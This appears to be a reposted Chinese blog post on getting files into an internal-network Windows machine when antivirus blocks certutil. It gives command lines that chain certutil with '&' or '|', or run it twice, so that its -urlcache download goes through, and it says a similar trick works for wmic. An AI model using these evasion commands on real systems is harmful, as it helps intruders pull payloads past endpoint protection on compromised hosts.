前言

一般进内网过后我都会使用certutil下载文件，但在最近打一台内网机子的时候出现了certutil拒绝访问的情况，在本地搭建了一个环境尝试绕过certutil下载文件。

certutil绕过

安装杀软更新到最新版本，开启所有防护，cmd下载certutil拦截如下：

方法一：用&和|绕过，语句如下

Certutil & Certutil –urlcache –f –split url

Certutil | Certutil –urlcache –f –split url

可以看到之前拒绝访问后下载成功

方法二：二次执行certutil

先执行一次certutil，再执行下载语句

想到这里，我试着用wmic方式下载，也是被拦截

于是尝试了跟certutil相同的方法，方法二可行如下

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 使用wmic.exe绕过应用程序白名单（多种方法）强大的WMIC wmic命令 wmic 命令使用详解 WMIC命令的利用技巧 windows WMIC 命令 Windows WMIC命令使用详解1 wmic命令用法小例 wmic 操作文件的datafile 使用CertUtil.exe下载远程文件